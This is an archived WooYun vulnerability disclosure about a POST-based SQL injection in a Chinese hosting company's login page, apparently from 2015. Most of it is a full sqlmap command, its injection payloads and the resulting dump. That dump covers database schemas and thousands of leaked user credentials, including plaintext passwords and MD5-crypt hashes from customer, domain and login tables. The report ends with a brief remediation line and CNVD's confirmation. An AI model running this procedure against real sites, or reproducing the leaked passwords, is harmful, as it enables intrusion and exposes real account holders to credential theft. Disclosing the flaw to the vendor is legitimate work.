乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-12: 细节已通知厂商并且等待厂商处理中 2015-12-16: 厂商已经确认,细节仅向厂商公开 2015-12-26: 细节向核心白帽子及相关领域专家公开 2016-01-05: 细节向普通白帽子公开 2016-01-15: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
东方网景主站存在高危POST型SQL注射漏洞(大量用户密码泄露)
地址:http://**.**.**.**/user/login
$ python sqlmap.py -u "http://**.**.**.**/user/login" -p username --technique=BES --output-dir=output --form --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass
---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: username=-2890' OR 2237=2237#&password=&verify=EGBB Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: username=-3369' OR 1 GROUP BY CONCAT(0x716a7a7a71,(SELECT (CASE WHEN (6586=6586) THEN 1 ELSE 0 END)),0x7170627871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=&verify=EGBB Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: username=Teuo';(SELECT * FROM (SELECT(SLEEP(5)))LxeR)#&password=&verify=EGBB---web application technology: Apache 2.2.22, PHP 5.3.17back-end DBMS: MySQL 5.0.11current user: 'user_epms@%'current user is DBA: Falsedatabase management system users [1]:[*] 'user_epms'@'%'Database: epmstest+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| support_Customer | 33152 || staff_log | 24013 || prima_tabLogins | 11155 || prima_tabMembers | 4639 || role_resource | 2673 || product_service | 1736 || file | 1527 || product_price | 950 || product | 726 || product_parameter_value | 701 || epms_resource | 466 || cms_doc | 359 || price | 340 || cms_pos_doc | 284 || cms_doc_product | 237 || product_staff | 198 || product_package | 172 || service | 140 || user_domain_info | 133 || cms_doc_news | 127 || cms_category | 120 || domain_contact | 106 || payment | 99 || staff_credit_pay | 98 || orders_product | 95 || product_parameter | 94 || orders | 85 || orders_payment | 85 || orders_product_copy | 77 || service_domain | 74 || role_staff | 72 || staff | 68 || cart_product | 65 || user_extend | 64 || product_category | 63 || ad | 57 || cms_pos | 55 || `user` | 53 || orders_change | 53 || cart | 52 || user_email | 45 || zhekou | 40 || renewal | 34 || staff_credit_recharge | 28 || service_function | 26 || cms_label | 24 || role | 24 || email_template | 19 || ftp_quotalimits | 18 || ftp_quotatallies | 18 || service_ftp | 18 || department | 17 || service_ftp_domain | 16 || special_domain | 15 || product_package_domain | 14 || article_category | 13 || invoice | 13 || service_database | 9 || service_email | 8 || service_extra | 7 || domain_dns | 6 || service_ftp_host | 6 || user_money_recharge | 5 || activity | 4 || question | 4 || service_dns | 4 || alipay | 3 || program | 3 || article | 2 || question_process | 2 || service_email_host | 2 || program_process | 1 || service_domain_access | 1 || service_package_split | 1 || user_money_pay | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 3111 || SESSION_VARIABLES | 325 || GLOBAL_VARIABLES | 314 || GLOBAL_STATUS | 287 || SESSION_STATUS | 287 || PARTITIONS | 273 || TABLES | 273 || STATISTICS | 260 || KEY_COLUMN_USAGE | 233 || TABLE_CONSTRAINTS | 231 || COLLATION_CHARACTER_SET_APPLICABILITY | 195 || COLLATIONS | 195 || CHARACTER_SETS | 39 || SCHEMA_PRIVILEGES | 30 || PLUGINS | 17 || PROCESSLIST | 11 || ENGINES | 6 || SCHEMATA | 3 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+Database: epms+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| staff_log | 17482969 || payment | 36390 || support_Customer | 33150 || orders_product | 32662 || login_log | 31111 || service | 28812 || question_process | 25239 || orders_payment | 23872 || orders | 23849 || trade_sum | 23388 || user_money_pay | 22745 || user_data_sign | 22038 || service_domain | 18437 || service_renewal | 17446 || question | 15105 || staff_credit_pay | 14858 || user_domain_info | 14306 || staff_credit_recharge | 13763 || renewal | 13520 || prima_tabLogins | 11155 || orders_change | 10946 || file | 8843 || user_money_recharge | 8365 || invoice | 8220 || user_extend | 8135 || `user` | 8122 || cart_product | 6703 || update_password | 5693 || special_price | 5225 || ftp_quotalimits | 5037 || service_ftp | 5028 || ftp_quotatallies | 4918 || prima_tabMembers | 4639 || domain_contact | 4411 || user_email | 4309 || user_data | 4222 || cart | 4178 || domain_optrecord | 3969 || role_resource | 3764 || service_email | 3705 || service_ftp_domain | 2890 || product_service | 2282 || alipay | 2105 || trusted_sites_domain | 2075 || trusted_sites | 1999 || service_log | 1948 || service_database | 1699 || update_time_log | 1536 || service_expand | 1299 || project_order | 1194 || invoice_flush | 1174 || service_extra | 1172 || product_price | 1109 || service_upgrade | 1046 || crontab_log | 1023 || project | 977 || product_parameter_value | 890 || product | 874 || idcwork | 869 || epms_resource | 675 || service_changeUser | 673 || idc_optlog | 624 || cms_doc | 574 || dns_log | 523 || idc_ip | 513 || staff_credit_return | 507 || idc_server | 465 || idc_switchport | 425 || price | 416 || cms_pos_doc | 415 || service_domain_access | 415 || cms_doc_product | 312 || cms_doc_news | 267 || service_tongyong | 243 || service_package_split | 242 || product_staff | 225 || product_package | 184 || tongyong_domain_contact | 175 || special_domain | 172 || cms_category | 122 || backup_apply | 120 || role_staff | 120 || product_parameter | 109 || ftp_agent | 104 || staff | 102 || trusted_sites_log | 92 || refund | 85 || renewal_category | 77 || service_rms | 71 || product_category | 69 || cms_pos | 67 || trusted_sites_data | 66 || ad | 63 || achievement_adjust | 57 || domain_dns | 52 || zhekou | 42 || service_dns | 41 || service_function | 34 || webnic_data | 31 || idc_shelf | 30 || role | 27 || email_template | 26 || cms_label | 25 || department | 17 || trial_form | 17 || idc_iprange | 16 || product_package_domain | 14 || service_ftp_host | 14 || article_category | 13 || delayed_renewal | 13 || activity | 11 || program_process | 10 || service_trial_change | 9 || idc_row | 7 || idc_vlan | 7 || program | 7 || account | 4 || attorn_domain | 4 || service_email_host | 3 || article | 2 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: epmstestTable: service_domain_access[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(30) |+----------+-------------+Database: epmstestTable: service_email[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: epmstestTable: prima_tabLogins[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(50) |+--------+-------------+Database: epmstestTable: service_domain[2 columns]+-------------------+-------------+| Column | Type |+-------------------+-------------+| password | varchar(32) || transfer_password | varchar(50) |+-------------------+-------------+Database: epmstestTable: support_Customer[2 columns]+--------------+-------------+| Column | Type |+--------------+-------------+| InitPassword | varchar(16) || Password | varchar(16) |+--------------+-------------+Database: epmstestTable: service_database[1 column]+-------------------+--------------+| Column | Type |+-------------------+--------------+| database_password | varchar(255) |+-------------------+--------------+Database: epmstestTable: user[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: epmstestTable: orders_access_password[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(15) |+----------+-------------+Database: epmstestTable: service_ftp[2 columns]+---------------+--------------+| Column | Type |+---------------+--------------+| ftp_password | varchar(255) || init_password | varchar(255) |+---------------+--------------+Database: epmstestTable: staff[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(32) |+----------+-------------+Database: epmsTable: service_database[1 column]+-------------------+--------------+| Column | Type |+-------------------+--------------+| database_password | varchar(255) |+-------------------+--------------+Database: epmsTable: service_domain_access[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(30) |+----------+-------------+Database: epmsTable: service_email[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: epmsTable: prima_tabLogins[1 column]+--------+-------------+| Column | Type |+--------+-------------+| passwd | varchar(50) |+--------+-------------+Database: epmsTable: service_domain[2 columns]+-------------------+-------------+| Column | Type |+-------------------+-------------+| password | varchar(32) || transfer_password | varchar(50) |+-------------------+-------------+Database: epmsTable: login_log[1 column]+----------+--------------+| Column | Type |+----------+--------------+| password | varchar(255) |+----------+--------------+Database: epmsTable: support_Customer[2 columns]+--------------+-------------+| Column | Type |+--------------+-------------+| InitPassword | varchar(16) || Password | varchar(16) |+--------------+-------------+Database: epmsTable: service_tongyong[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(15) |+----------+-------------+Database: epmsTable: tongyong_domain_contact[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(15) |+----------+-------------+Database: epmsTable: user[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(50) |+----------+-------------+Database: epmsTable: orders_access_password[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(15) |+----------+-------------+Database: epmsTable: service_ftp[2 columns]+---------------+--------------+| Column | Type |+---------------+--------------+| ftp_password | varchar(255) || init_password | varchar(255) |+---------------+--------------+Database: epmsTable: staff[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(32) |+----------+-------------+Database: epmstestTable: service_domain_access[1 entry]+----------+| password |+----------+| 123456 |+----------+Database: epmstestTable: service_email[8 entries]+------------+| password |+------------+| 1q1s9252eb || 5jijg4d980 || 7iq0e14hjj || 7o05assl3r || bt7i3hojie || hnjs || im5jomm4s8 || p7nltg04qk |+------------+
atabase: epmstestTable: prima_tabLogins[11155 entries]+------------------------------------+| passwd |+------------------------------------+| $1$..00810E$.elN1lI9WqZz6fTexstiq1 || $1$..2/j52Z$O8Qlg8.o1EB4jYtG.gREe1 || $1$..7/CD.X$bdgpS5SrHn1ICeZuzLhP00 || $1$..llAKiC$ILSycKO1BSLaat0JasQw.0 || $1$..VattaE$ogWpndv2EtvXBR9AO7HuE. || $1$./e1Lqnn$kEgykZSC6gUcRupteplVi. || $1$./Q/b8pu$ef6pkThDJCiYpl4t1dSeY0 || $1$./S5b/08$YBWFduPjOK1EiXjGYJ2ES0 || $1$.0//auds$wZhqCa2UrP5uEb2y6J7HI. || $1$.0Q1GanG$6dT479a7Svdx.gtg7tjy.. || $1$.0R0X1xL$TcS0.hpIcJ4/Ygl/R/wi0. || $1$.0X1rcZy$LbdN5RYApYPkPEHEsFwjl1 || $1$.0Y1gT2E$BNqG.RYivO92ZwiZho7YE0 || $1$.1TSzARA$C2qGxQZ7AcnLMYAOKuTSd/ || $1$.1y/G5BF$3h8Rkzb4MgVCzYHwjm2Ck0 || $1$.2F/PLea$R0TfwMIt1Zb226FYI6Pr61 || $1$.2m1kZb0$O1mOU9b6L/.yfRhgjZzkC0 || $1$.3I1vK74$7KYBmv8kM2709P5ylOop4. || $1$.3j/4Tfy$EpD8ycQsGRCbZglZs/Xx// || $1$.3J/pzAM$coWaz3FEF07HUKV1kruxq/ || $1$.3K08z.h$KVfTvLpUpdBqyqHQgYHwX/ || $1$.511Tiva$bDWU3W8EKX97PUw5zrCvb/ || $1$.519jHf6$Bta/3ZGQkQQeo2xa40AXN. || $1$.521m5t3$QZEgOof1OvLODNsNSp2Xk. || $1$.5B1xYkc$DnD645g5t0DUa35cPeARW/ || $1$.5C1ICG9$ZDyxkJpivtonE7dIu5YWz. || $1$.5Z04EOj$6GqSy7ENpk3qXscOtLm8o. || $1$.6./oIkp$9vuQRvnichXJf5FgFO2yK0 || $1$.6azq6jD$nMJh0qEG.ypKUQyZAR8HT. || $1$.6uadVk6$EwtuT2ca0NQFk318NLGFG/ || $1$.791rwKl$oyfZPFMhGHOICGBRvDfPg/ || $1$.8//BmHp$gCcJ8wOFPhQreVgyx./bZ/ || $1$.8A/WSs7$an6MMUpafHOwKPSEMPT841 || $1$.8D04UsJ$24DAl2Nh8cj632eonff6.0 || $1$.8I0bAco$2tdkex6mUUg01qkkEUQoJ. || $1$.8q/uwAh$bKzhyh1VuwYoE8k/wvqJQ1 || $1$.8u/Lh51$Ww/cwMlmY3pBl.PpBGwx30 || $1$.98EClM9$XsUsdM2Rt8iueCW4EisW.. || $1$.9B14aMR$VWVI3EQq3yp5xSa4Q/Zg50 || $1$.9e1G8Ok$5G68eJP25MruNgWpH86Jz. || $1$.A41tC/0$EEh1ht0RY7Hf/kwoouVSA/ || $1$.ad/VmAm$hJOWIftYXQmi//fuOSiGz1 || $1$.ah101Xj$LcPO.0ph4L4N/ZukOxZGP1 || $1$.ak186MH$r.EaUz6qr.ESHdeUKxRjk/ || $1$.ap/72SJ$pJrJktNyhDDAdOMzhMACm. || $1$.Ba0gdhP$4l2UYoHSsByanzIhffQce1 || $1$.bh0qZjJ$aFG5PFSvsEBojE/RW57DZ. || $1$.Bj/Kk3D$klzoQzRU4UnztYm8zjqkQ0 || $1$.BK06wk7$hhX6O31iCRAAMZtqrZuOP/ || $1$.bobuOWA$quVnzx1hXPyRIL/Nv7uUK0 || $1$.bu0hNkp$fz/m3GnbCh9H9aFZhPbnd1 || $1$.bX0Hm/7$5RGoX0728f1lh7Ih0lvQW1 || $1$.BY0JjMs$Z.DPsLDb/I6e1/c5WQZhg. || $1$.bZ0WYQi$ji0kxSVGr.Gj.XI2qVlyu. || $1$.c40qkTV$Za6q.Yd9wch4SgyhevE9i0 || $1$.Cbxmxb6$t58AyrmEkKJ41bPSMbVJu. || $1$.cD07t48$/UylFC5dRDdAh4oFKxUOj/ || $1$.cKwyT.C$AbvGcwd/mb8rFNC4rbMrQ/ || $1$.cU1Shfd$onRxER11b0nBnvS.X70nt/ || $1$.Cw/qjkR$Bpa4Pi2xCciOZL7yWXOCn. || $1$.d51EZiA$i5YiwPEJ766o2pj5TRjwA0 || $1$.d8/S4o4$KXk/SfW3vFKEBsSjcm5mA. || $1$.Dd0hxsy$XpsxTwmAOl1.gkwhq4Tts1 || $1$.Dj/ICHb$9NfulTJXqRD3Lt/q50ytm/ || $1$.dW/p34Y$D7ZkEXfylRXwPxOwttBI0/ || $1$.EAE3loE$2S4WBImA2aQ1MC2RskL.R0 || $1$.Ec/le/c$01kGIMzGkYS65B6I94C/S/ || $1$.EC1PT0h$aQpGOAGNPeKNd9K394bbF/ || $1$.EG//3/k$CTP2vwCsxk3lZFvRgUDPv. || $1$.ei1U1lg$kYMPvvFR/Jd2H0fzgMBeC1 || $1$.f40db89$BuMelp.zssWMH56d4t/Sn1 || $1$.fbStdk7$CsghvuXCsZvpgkg4pPhzF. || $1$.fsRTU49$cx8o/ZxaGmD/ZRPCRrPlv0 || $1$.FtMp80A$NLT9MVqrehdtpZdE3cZls/ || $1$.Gd17b.0$Yh1CzQzEMohVTguD6w2tQ1 || $1$.gf1JKTp$.coBZxkVcyJgdeDG2lXXG/ || $1$.gq/bVoQ$ohF7eHH2GJpmr0lnMl8ZC0 || $1$.gx0OfrV$PZnjAhd/l0CRD.o6NVcm30 || $1$.h5/rYZt$I/MFcJP/q3zTc06Kx7uLl0 || $1$.H6/ka66$5cnssdqDEAajSfa564Hms0 || $1$.HA./o2B$XYTB1TIm44Bl72Fhr7nn3. || $1$.Hi0MnxB$2weI9BRZhnNEHL2ViOgY7/ || $1$.hY1PotC$aNvDa/.mFmKtc27.bTvGX1 || $1$.IO/ZoQw$ZfijHJQinXrmLHHeZG5H.0 || $1$.IObhqEC$a33N71Cf59/zssFlUfJlY/ || $1$.irNYtx9$7q2bKOFa9KG6BImhGu6uD0 || $1$.IV0SNym$.yGjmOFB79NPBVfi7XE8G/ || $1$.ix0Wrj2$.ROGYi52xmCJ3Iojzbtz./ || $1$.Iy6QOcB$pXK.TPFd6RqH94s1JFmu0/ || $1$.J30r6Lh$pAYbEdvl/xfrpKkniqqxe/ || $1$.j5/bBFO$4WDMWBNKSOzMqwScUrtwn1 || $1$.JA/RjSh$HdJd15GzKUCo9waezrMqp1 || $1$.jI0brWv$z4BGiNSEvf/g45DwGHlL80 || $1$.jl06Son$vC27YkuEITDd1QFnMPC4q/ || $1$.Jw02v1Q$V4JIJqROV26PYmnayx8df. || $1$.Ka1zHQM$ZHuIQCKKGwkBHx7rz5bfN0 || $1$.KMxiqB7$wla33yvluZrO/ljBGYl/t1 || $1$.KW0phBd$bHNQH4n2onZ.lrBv42os./ || $1$.l41qUld$kBZJ/cqrIFeTPGCk6MlwU/ || $1$.lb1mCdM$Q0SXrQrxXFI8gw.kwy73C. || $1$.Lh/XknG$rlbsYNJXfnxCLwmOEbOLL0 || $1$.ll0If3u$fshwrSHwCZdAR8ieWERab. || $1$.Ln1F/fQ$kc0cjxfrA2dhE9Sggnz0K/ |
Database: epmstestTable: service_domain[74 entries]+----------+-------------------+| password | transfer_password |+----------+-------------------+| | 82a4ff9b || | gj3h3gnkmd || | || | || | arsfb0bq6r || | || | || | || | || | || | || | btfgeklmes || | irjet5965i || | si1m4anrja || | bbj44hp1dg || | || | || | || | || | a83545cb || | bfac3928 || | 2d975d57 || | f4207369 || | e7f98d7b || | 2a5bee05 || | 6a45ac65 || | c51ab38b || | 4d9dc99e || | fee1747f || | 47f00c18 || | 7162050e || | f0fd564b || | cd4bab83 || | cb18301d || | bda1f638 || | fe8fe214 || | nh1mbjb8jm || | || | || | || | o2ms8b20f1 || | me2qb84hsl || | || | ntes9qdgnd || | njon5g89i0 || | 564e4t013r || | h6sm6nr2jf || | || | || | 44b8t9a18t || | || | || | || | || | || | || | i4ppm1nn9s || | || | || | || | nbpqn68mbg || | 123456 || | || | qepnn1hl5l || | 2kdapl3ijn || | || | ott8rrqmer || | || | FyhpHE || | 464149 || | 6e73322e65 || | || | k6m5fdiqbo || | |+----------+-------------------+Database: epmstestTable: support_Customer[33152 entries]+-------------------+------------------+| InitPassword | Password |+-------------------+------------------+| | || | || | || | || dgq1967 | !2#4567* || !@hrg@! | !@hrg@! || !abc | !abc || gardenwio | !QAZ2wsx#EDC || !qnvecexoay | !qnvecexoay || ricki | !TRS-2011* || !woshibinbin? | !woshibinbin? || chinahil | !zhongyuan2008 || !zxz198 | !zxz198 || ha1140 | #aTch123 || cnpec | #c3n7p0e0* || cn1234 | #Cnis20O8# || #EDC4rfv | #EDC4rfv || sonicway | #SonicwayDomain || #thj2721576# | #thj2721576# || &%#369 | &%#369 || )(*&^%$#@! | )(*&^%$#@! || *#06# | *#06# || ***** | ***** || ****** | ****** || ****** | ****** || ******** | ******** || ******** | ******** || ********** | ********** || ***--- | ***--- || **63*7089 | **63*7089 || unicorn | *+Soo_in0??27 || *09205223* | *09205223* || 123456 | *20050630* || 818669 | *Abit123 || tsinghuazyh | *happyxu2 || *Iamtlql* | *Iamtlql* || kmhnahotel | *kmhnair* |
Database: epmsTable: service_domain_access[415 entries]+------------------+| password |+------------------+| !1nNV$g34* || $idahzrx@2 || $idahzrx@2 || )gf3d*v!^? || ,bo42I{mc\\ || 03pt3qe22b || 05eh5e54o0 || 05SdZ6BM/y || 05SdZ6BM/y || 08laqptom9 || 0gbjme7s5k || 0ia6426jl5 || 0j2s=lR*d[ || 0lr10hb2ob || 0o64293m01 || 0r4nm9metn || 0t5qlikgne || 0tnp2lqtq6 || 1(c:,62vio || 10006277 || 10t168d5jb || 11ttKb!RI2 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 || 123456 |
Database: epmsTable: prima_tabLogins[11155 entries]+------------------------------------+| passwd |+------------------------------------+| $1$..00810E$.elN1lI9WqZz6fTexstiq1 || $1$..2/j52Z$O8Qlg8.o1EB4jYtG.gREe1 || $1$..7/CD.X$bdgpS5SrHn1ICeZuzLhP00 || $1$..llAKiC$ILSycKO1BSLaat0JasQw.0 || $1$..VattaE$ogWpndv2EtvXBR9AO7HuE. || $1$./e1Lqnn$kEgykZSC6gUcRupteplVi. || $1$./Q/b8pu$ef6pkThDJCiYpl4t1dSeY0 || $1$./S5b/08$YBWFduPjOK1EiXjGYJ2ES0 || $1$.0//auds$wZhqCa2UrP5uEb2y6J7HI. || $1$.0Q1GanG$6dT479a7Svdx.gtg7tjy.. || $1$.0R0X1xL$TcS0.hpIcJ4/Ygl/R/wi0. || $1$.0X1rcZy$LbdN5RYApYPkPEHEsFwjl1 || $1$.0Y1gT2E$BNqG.RYivO92ZwiZho7YE0 || $1$.1TSzARA$C2qGxQZ7AcnLMYAOKuTSd/ || $1$.1y/G5BF$3h8Rkzb4MgVCzYHwjm2Ck0 || $1$.2F/PLea$R0TfwMIt1Zb226FYI6Pr61 || $1$.2m1kZb0$O1mOU9b6L/.yfRhgjZzkC0 || $1$.3I1vK74$7KYBmv8kM2709P5ylOop4. || $1$.3j/4Tfy$EpD8ycQsGRCbZglZs/Xx// || $1$.3J/pzAM$coWaz3FEF07HUKV1kruxq/ || $1$.3K08z.h$KVfTvLpUpdBqyqHQgYHwX/ || $1$.511Tiva$bDWU3W8EKX97PUw5zrCvb/ || $1$.519jHf6$Bta/3ZGQkQQeo2xa40AXN. || $1$.521m5t3$QZEgOof1OvLODNsNSp2Xk. || $1$.5B1xYkc$DnD645g5t0DUa35cPeARW/ || $1$.5C1ICG9$ZDyxkJpivtonE7dIu5YWz. || $1$.5Z04EOj$6GqSy7ENpk3qXscOtLm8o. || $1$.6./oIkp$9vuQRvnichXJf5FgFO2yK0 || $1$.6azq6jD$nMJh0qEG.ypKUQyZAR8HT. || $1$.6uadVk6$EwtuT2ca0NQFk318NLGFG/ || $1$.791rwKl$oyfZPFMhGHOICGBRvDfPg/ || $1$.8//BmHp$gCcJ8wOFPhQreVgyx./bZ/ || $1$.8A/WSs7$an6MMUpafHOwKPSEMPT841 || $1$.8D04UsJ$24DAl2Nh8cj632eonff6.0 |
上WAF。
危害等级:高
漏洞Rank:11
确认时间:2015-12-16 19:06
CNVD确认并复现所述情况,已经转由CNCERT发其信息安全管理部门,由其后续协调网站管理单位处置。
暂无